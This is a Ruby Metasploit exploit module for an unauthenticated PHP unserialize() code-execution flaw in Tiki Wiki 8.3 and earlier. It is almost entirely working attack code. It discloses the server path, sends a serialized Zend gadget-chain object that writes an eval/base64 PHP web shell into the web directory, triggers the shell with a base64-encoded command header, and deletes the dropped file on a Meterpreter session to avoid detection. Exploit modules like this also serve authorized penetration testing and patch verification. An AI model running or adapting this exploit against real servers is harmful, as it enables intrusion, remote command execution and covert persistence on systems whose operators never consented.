wiki

1. ##
2. # This module requires Metasploit: http//metasploit.com/download
3. # Current source: https://github.com/rapid7/metasploit-framework
4. ##
5.  
6. require 'msf/core'
7.  
8. class Metasploit3 < Msf::Exploit::Remote
9.   Rank = ExcellentRanking
10.  
11.   include Msf::Exploit::Remote::HttpClient
12.  
13.   def initialize(info = {})
14.     super(update_info(info,
15.       'Name'           => 'Tiki Wiki <= 8.3 unserialize() PHP Code Execution',
16.       'Description'    => %q{
17.           This module exploits a php unserialize() vulnerability in Tiki Wiki <= 8.3
18.         which could be abused to allow unauthenticated users to execute arbitrary code
19.         under the context of the webserver user.
20.  
21.         The dangerous unserialize() exists in the 'tiki-print_multi_pages.php' script,
22.         which is called with user controlled data from the 'printpages' parameter.
23.         The exploit abuses the __destruct() method from the Zend_Pdf_ElementFactory_Proxy
24.         class to write arbitrary PHP code to a file on the Tiki Wiki web directory.
25.  
26.         In order to run successfully three conditions must be satisfied (1) display_errors
27.         php setting must be On to disclose the filesystem path of Tiki Wiki, (2) The Tiki
28.         Wiki Multiprint feature must be enabled to exploit the unserialize() and (3) a php
29.         version older than 5.3.4 must be used to allow poison null bytes in filesystem related
30.         functions. The exploit has been tested successfully on Ubuntu 9.10 and Tiki Wiki 8.3.
31.       },
32.       'Author'  =>
33.         [
34.           'EgiX', # Vulnerability discovery and PoC
35.           'juan vazquez' # Metasploit module
36.         ],
37.       'License'        => MSF_LICENSE,
38.       'References'     =>
39.         [
40.           [ 'CVE', '2012-0911' ],
41.           [ 'OSVDB', '83534' ],
42.           [ 'BID', '54298' ],
43.           [ 'EDB', '19573' ],
44.           [ 'URL', 'http://dev.tiki.org/item4109' ]
45.         ],
46.       'Privileged'     => false,
47.       'Platform'       => ['php'],
48.       'Arch'           => ARCH_PHP,
49.       'Payload'        =>
50.         {
51.           'DisableNops' => true,
52.         },
53.       'Targets'        => [ ['Automatic', {}] ],
54.       'DefaultTarget'  => 0,
55.       'DisclosureDate' => 'Jul 04 2012'
56.       ))
57.  
58.       register_options(
59.         [
60.           OptString.new('TARGETURI', [ true, "The base path to the web application", "/tiki/"])
61.         ], self.class)
62.   end
63.  
64.  
65.   def on_new_session(client)
66.     if client.type == "meterpreter"
67.       client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
68.       begin
69.         print_warning("#{peer} - Deleting #{@upload_php}")
70.         client.fs.file.rm(@upload_php)
71.         print_good("#{peer} - #{@upload_php} removed to stay ninja")
72.       rescue
73.         print_error("#{peer} - Unable to remove #{f}")
74.       end
75.     end
76.   end
77.  
78.   def exploit
79.     base = target_uri.path
80.     base << '/' if base[-1, 1] != '/'
81.     @upload_php = rand_text_alpha(rand(4) + 4) + ".php"
82.  
83.     print_status("#{peer} - Disclosing the path of the Tiki Wiki on the filesystem")
84.  
85.     res = send_request_cgi(
86.       'uri' => normalize_uri(base, "tiki-rss_error.php")
87.     )
88.  
89.     if not res or res.code != 200 or not res.body =~ /[> ](\/.*)tiki-rss_error\.php/
90.       print_error "Tiki Wiki path couldn't be disclosed. The php setting 'display_errors' must be On."
91.       return
92.     else
93.       tiki_path = $1
94.       print_good "#{peer} - Tiki Wiki path disclosure: #{tiki_path}"
95.     end
96.  
97.     php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>"
98.  
99.     printpages = "O:29:\"Zend_Pdf_ElementFactory_Proxy\":1:"
100.     printpages << "{s:39:\"%00Zend_Pdf_ElementFactory_Proxy%00_factory\";O:51:\"Zend_Search_Lucene_Index_SegmentWriter_StreamWriter\":5:"
101.     printpages << "{s:12:\"%00*%00_docCount\";i:1;s:8:\"%00*%00_name\";s:3:\"foo\";s:13:\"%00*%00_directory\";O:47:\"Zend_Search_Lucene_Storage_Directory_Filesystem\":1:"
102.     printpages << "{s:11:\"%00*%00_dirPath\";s:#{tiki_path.length + @upload_php.length + 1}:\"#{tiki_path + @upload_php}%00\";}"
103.     printpages << "s:10:\"%00*%00_fields\";a:1:"
104.     printpages << "{i:0;O:34:\"Zend_Search_Lucene_Index_FieldInfo\":1:"
105.     printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}"
106.     printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}"
107.  
108.     print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
109.  
110.     res = send_request_cgi(
111.     {
112.       'uri' => normalize_uri(base, "tiki-print_multi_pages.php"),
113.       'method' => 'POST',
114.       'vars_post' => {
115.         'printpages' => printpages
116.       }
117.     })
118.  
119.     if not res or res.code != 200
120.       print_error("#{peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.")
121.       return
122.     end
123.  
124.     print_status("#{peer} - Executing the payload #{@upload_php}")
125.  
126.     res = send_request_cgi(
127.     {
128.       'method' => 'GET',
129.       'uri'    => normalize_uri(base, @upload_php),
130.       'headers' => {
131.         'Cmd' => Rex::Text.encode_base64(payload.encoded)
132.       }
133.     })
134.  
135.     if res
136.       print_error("#{peer} - Payload execution failed: #{res.code}")
137.       return
138.     end
139.  
140.   end
141. end